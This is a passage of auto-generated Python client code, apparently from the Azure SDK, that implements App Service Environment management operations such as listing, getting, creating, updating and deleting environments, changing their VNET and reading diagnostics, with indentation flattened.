:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceEnvironmentCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("AppServiceEnvironmentCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': "/subscriptions/{subscriptionId}/providers/Microsoft.Web/hostingEnvironments"} # type: ignore
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> Iterable[_models.AppServiceEnvironmentCollection]:
"""Get all App Service Environments in a resource group.
Get all App Service Environments in a resource group.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceEnvironmentCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_resource_group.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("AppServiceEnvironmentCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments"} # type: ignore
@distributed_trace
def get(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.AppServiceEnvironmentResource:
"""Get the properties of an App Service Environment.
Get the properties of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceEnvironmentResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentResource]
request = build_get_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
def _create_or_update_initial(
self,
resource_group_name: str,
name: str,
hosting_environment_envelope: _models.AppServiceEnvironmentResource,
**kwargs: Any
) -> _models.AppServiceEnvironmentResource:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentResource]
_json = self._serialize.body(hosting_environment_envelope, 'AppServiceEnvironmentResource')
request = build_create_or_update_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
@distributed_trace
def begin_create_or_update(
self,
resource_group_name: str,
name: str,
hosting_environment_envelope: _models.AppServiceEnvironmentResource,
**kwargs: Any
) -> LROPoller[_models.AppServiceEnvironmentResource]:
"""Create or update an App Service Environment.
Create or update an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param hosting_environment_envelope: Configuration details of the App Service Environment.
:type hosting_environment_envelope:
~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either AppServiceEnvironmentResource or the
result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentResource]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
hosting_environment_envelope=hosting_environment_envelope,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
def _delete_initial( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
name: str,
force_delete: Optional[bool] = None,
**kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[None]
request = build_delete_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
force_delete=force_delete,
template_url=self._delete_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
@distributed_trace
def begin_delete( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
name: str,
force_delete: Optional[bool] = None,
**kwargs: Any
) -> LROPoller[None]:
"""Delete an App Service Environment.
Delete an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param force_delete: Specify :code:`<code>true</code>` to force the deletion even if the App
Service Environment contains resources. The default is :code:`<code>false</code>`.
:type force_delete: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[None]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
force_delete=force_delete,
api_version=api_version,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
@distributed_trace
def update(
self,
resource_group_name: str,
name: str,
hosting_environment_envelope: _models.AppServiceEnvironmentPatchResource,
**kwargs: Any
) -> _models.AppServiceEnvironmentResource:
"""Create or update an App Service Environment.
Create or update an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param hosting_environment_envelope: Configuration details of the App Service Environment.
:type hosting_environment_envelope:
~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentPatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceEnvironmentResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentResource]
_json = self._serialize.body(hosting_environment_envelope, 'AppServiceEnvironmentPatchResource')
request = build_update_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.update.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
@distributed_trace
def list_capacities(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.StampCapacityCollection]:
"""Get the used, available, and total worker capacity an App Service Environment.
Get the used, available, and total worker capacity an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StampCapacityCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.StampCapacityCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.StampCapacityCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_capacities_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_capacities.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_capacities_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("StampCapacityCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_capacities.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/compute"} # type: ignore
@distributed_trace
def get_vip_info(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.AddressResponse:
"""Get IP addresses assigned to an App Service Environment.
Get IP addresses assigned to an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AddressResponse, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.AddressResponse
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AddressResponse]
request = build_get_vip_info_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_vip_info.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AddressResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_vip_info.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/virtualip"} # type: ignore
def _change_vnet_initial(
self,
resource_group_name: str,
name: str,
vnet_info: _models.VirtualNetworkProfile,
**kwargs: Any
) -> _models.WebAppCollection:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
_json = self._serialize.body(vnet_info, 'VirtualNetworkProfile')
request = build_change_vnet_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._change_vnet_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WebAppCollection', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('WebAppCollection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_change_vnet_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/changeVirtualNetwork"} # type: ignore
@distributed_trace
def begin_change_vnet(
self,
resource_group_name: str,
name: str,
vnet_info: _models.VirtualNetworkProfile,
**kwargs: Any
) -> LROPoller[ItemPaged[_models.WebAppCollection]]:
"""Move an App Service Environment to a different VNET.
Move an App Service Environment to a different VNET.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param vnet_info: Details for the new virtual network.
:type vnet_info: ~azure.mgmt.web.v2019_08_01.models.VirtualNetworkProfile
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns an iterator like instance of either
WebAppCollection or the result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WebAppCollection]]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WebAppCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
_json = self._serialize.body(vnet_info, 'VirtualNetworkProfile')
request = build_change_vnet_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.begin_change_vnet.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
_json = self._serialize.body(vnet_info, 'VirtualNetworkProfile')
request = build_change_vnet_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WebAppCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._change_vnet_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
vnet_info=vnet_info,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return get_next(next_link)
return ItemPaged(
internal_get_next, extract_data
)
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_change_vnet.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/changeVirtualNetwork"} # type: ignore
@distributed_trace
def list_diagnostics(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> List[_models.HostingEnvironmentDiagnostics]:
"""Get diagnostic information for an App Service Environment.
Get diagnostic information for an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of HostingEnvironmentDiagnostics, or the result of cls(response)
:rtype: list[~azure.mgmt.web.v2019_08_01.models.HostingEnvironmentDiagnostics]
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[List[_models.HostingEnvironmentDiagnostics]]
request = build_list_diagnostics_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_diagnostics.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[HostingEnvironmentDiagnostics]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_diagnostics.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics"} # type: ignore
@distributed_trace
def get_diagnostics_item(
self,
resource_group_name: str,
name: str,
diagnostics_name: str,
**kwargs: Any
) -> _models.HostingEnvironmentDiagnostics:
"""Get a diagnostics item for an App Service Environment.
Get a diagnostics item for an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param diagnostics_name: Name of the diagnostics item.
:type diagnostics_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: HostingEnvironmentDiagnostics, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.HostingEnvironmentDiagnostics
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
